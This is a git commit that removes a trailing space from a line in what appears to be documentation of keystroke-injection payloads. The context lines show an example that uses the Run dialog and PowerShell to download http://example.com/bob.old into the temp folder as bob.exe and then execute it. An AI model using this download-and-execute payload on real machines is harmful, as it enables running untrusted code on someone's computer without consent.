Removed space at the end of a "DELAY 100" line

This commit is contained in:
Tim Mattison 2014-07-28 15:41:23 -07:00
parent 35222b1868
commit bdb5a86b9d
1 changed files with 1 additions and 1 deletions

View File

@ -24,7 +24,7 @@ The steps of this example can be broken down into:
An example of using Powershell to download a file from the web and then execute it.
DELAY 3000
GUI r
DELAY 100
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe');
DELAY 100
STRING Start-Process "%TEMP%\bob.exe"